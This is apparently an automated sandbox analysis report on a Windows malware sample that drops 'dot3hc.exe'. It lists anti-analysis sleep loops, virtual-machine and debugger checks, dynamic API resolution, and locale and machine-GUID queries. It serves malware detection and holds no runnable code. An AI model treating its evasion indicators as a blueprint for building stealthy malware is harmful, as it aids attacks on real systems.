Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap, 0_2_02635060
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6408 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6408 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_02633A10
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_02633A10
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02173A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose, 3_2_02173A10
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040D8AC VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect, 0_2_0040D8AC
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040D8AC VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect, 0_2_0040D8AC
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000007.00000002.488474706.0000027E35662000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000006.00000002.481994541.000001F95C402000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.488445142.0000027E35655000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000007.00000002.483403302.0000027E2FE29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW]f5~
Source: svchost.exe, 00000006.00000002.482120336.000001F95C429000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.482526087.0000022005268000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.482223226.000002088D829000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000007.00000002.488474706.0000027E35662000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000006.00000002.481994541.000001F95C402000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.488445142.0000027E35655000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000007.00000002.483403302.0000027E2FE29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW]f5~
Source: svchost.exe, 00000006.00000002.482120336.000001F95C429000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.482526087.0000022005268000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.482223226.000002088D829000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 0_2_00402770
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 0_2_00402770
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 0_2_00402770
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 0_2_00402770
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02634E10 mov eax, dword ptr fs:[00000030h] 0_2_02634E10
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02633F70 mov eax, dword ptr fs:[00000030h] 0_2_02633F70
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02125B0E mov eax, dword ptr fs:[00000030h] 0_2_02125B0E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02120456 mov eax, dword ptr fs:[00000030h] 0_2_02120456
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212095E mov eax, dword ptr fs:[00000030h] 0_2_0212095E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_021269AE mov eax, dword ptr fs:[00000030h] 0_2_021269AE
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_025E1030 mov eax, dword ptr fs:[00000030h] 0_2_025E1030
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02634E10 mov eax, dword ptr fs:[00000030h] 0_2_02634E10
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02633F70 mov eax, dword ptr fs:[00000030h] 0_2_02633F70
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02125B0E mov eax, dword ptr fs:[00000030h] 0_2_02125B0E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02120456 mov eax, dword ptr fs:[00000030h] 0_2_02120456
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212095E mov eax, dword ptr fs:[00000030h] 0_2_0212095E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_021269AE mov eax, dword ptr fs:[00000030h] 0_2_021269AE
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_025E1030 mov eax, dword ptr fs:[00000030h] 0_2_025E1030
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02174E10 mov eax, dword ptr fs:[00000030h] 3_2_02174E10
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02173F70 mov eax, dword ptr fs:[00000030h] 3_2_02173F70
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_020E1030 mov eax, dword ptr fs:[00000030h] 3_2_020E1030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_02633A10
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_02633A10
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00409FBA SetUnhandledExceptionFilter, 0_2_00409FBA
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00409FCE SetUnhandledExceptionFilter, 0_2_00409FCE
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00409FBA SetUnhandledExceptionFilter, 0_2_00409FBA
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00409FCE SetUnhandledExceptionFilter, 0_2_00409FCE
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00409FBA SetUnhandledExceptionFilter, 3_2_00409FBA
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00409FCE SetUnhandledExceptionFilter, 3_2_00409FCE
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Progman
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Progman
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA, 0_2_0040CC72
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 0_2_0040F81E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 0_2_0040F8DA
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 0_2_0040F94E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 0_2_0040D1C8
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: _strlen,EnumSystemLocalesA, 0_2_0040D191
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: _strlen,EnumSystemLocalesA, 0_2_0040D24E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 0_2_0040FA01
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA, 0_2_0040D6A0
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale, 0_2_0040D2A3
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA, 0_2_0040CC72
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 0_2_0040F81E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 0_2_0040F8DA
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 0_2_0040F94E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 0_2_0040D1C8
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: _strlen,EnumSystemLocalesA, 0_2_0040D191
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: _strlen,EnumSystemLocalesA, 0_2_0040D24E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 0_2_0040FA01
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA, 0_2_0040D6A0
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale, 0_2_0040D2A3
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoA, 3_2_0040CC72
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 3_2_0040F81E
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 3_2_0040F8DA
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 3_2_0040F94E
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 3_2_0040D1C8
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: _strlen,EnumSystemLocalesA, 3_2_0040D191
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: _strlen,EnumSystemLocalesA, 3_2_0040D24E
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 3_2_0040FA01
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoA, 3_2_0040D6A0
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale, 3_2_0040D2A3
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040B346 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_0040B346
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040B346 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_0040B346
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00405A89 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,_fast_error_exit,_fast_error_exit,GetCommandLineA,GetStartupInfoA,GetModuleHandleA, 0_2_00405A89
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00405A89 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,_fast_error_exit,_fast_error_exit,GetCommandLineA,GetStartupInfoA,GetModuleHandleA, 0_2_00405A89
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
